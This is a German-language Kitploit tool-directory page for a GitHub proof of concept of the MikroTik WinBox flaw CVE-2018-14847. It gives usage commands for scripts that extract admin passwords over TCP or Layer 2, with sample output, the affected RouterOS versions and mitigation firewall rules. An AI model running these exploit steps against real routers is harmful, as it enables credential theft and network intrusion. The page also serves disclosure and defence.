Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Mikrotik-router-hack — Dies ist ein Proof of Concept der kritischen WinBox-Schwachstelle (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht. Die Schwachstelle wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Du kannst es stattdessen forken und selbst aktualisieren. | Kitploit
Tools/GitHubGitHub/hacker30468/mikrotik-router-hack
PasswortangriffeSchwachstellenanalyseExploitationInformationsbeschaffungNetzwerksicherheitPenetrationstests
GitHubhacker30468/mikrotik-router-hack

Mikrotik-router-hack

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

5523vor 5 JahrenVon Kitploit geprüft

Dies ist ein Proof of Concept der kritischen WinBox-Schwachstelle (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht. Die Schwachstelle wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Du kannst es stattdessen forken und selbst aktualisieren.

Teilen

WinboxExploit

Dies ist ein Proof of Concept der kritischen WinBox-Sicherheitslücke (CVE-2018-14847), die das beliebige Lesen von Dateien mit Klartext-Passwörtern ermöglicht.

Die Sicherheitslücke wurde bereits vor langer Zeit behoben, daher ist dieses Projekt beendet und wird nicht mehr unterstützt oder aktualisiert. Du kannst es stattdessen forken und selbst aktualisieren.

Blogbeitrag

https://n0p.me/winbox-bug-dissection/

Anforderungen

  • Python 3+

Dieses Skript läuft NICHT mit Python 2.x oder niedriger.

Verwendung

Das Skript wird einfach mit einfachen Argumenten in der Befehlszeile verwendet.

WinBox (TCP/IP)

Nutze die Sicherheitslücke aus und lies das Passwort.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

Beispiel:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC-Server-WinBox (Layer 2)

Du kannst Dateien extrahieren, selbst wenn das Gerät keine IP-Adresse hat.

Einfacher Erkennungscheck für lokal verbundene Mikrotik-Geräte.

root@kitploit:~
python3 MACServerDiscover.py

Beispiel:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Nutze die Sicherheitslücke aus und lies das Passwort.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

Beispiel:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

Anfällige Versionen

Alle RouterOS-Versionen von 2015-05-28 bis 2018-04-20 sind für diesen Exploit anfällig.

Mikrotik-Geräte mit den folgenden RouterOS-Versionen:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

Für weitere Informationen siehe: https://blog.mikrotik.com/security/winbox-vulnerability.html

Gegenmaßnahmen

  • Aktualisiere den Router auf eine RouterOS-Version, die den Fix enthält.
  • Deaktiviere den WinBox-Dienst auf dem Router.
  • Du kannst den Zugriff auf den WinBox-Dienst wie folgt auf bestimmte IP-Adressen beschränken:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • Du kannst einige Filterregeln (ACL) verwenden, um den externen Zugriff auf den WinBox-Dienst zu verweigern:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • Du kannst den Zugriff auf den mac-winbox-Dienst einschränken, indem du erlaubte Schnittstellen angibst:
root@kitploit:~
/tool mac-server mac-winbox

Urheberrecht

  • Gesponsert von Irans CERTCC(https://certcc.ir). Alle Rechte vorbehalten.
Tool herunterladen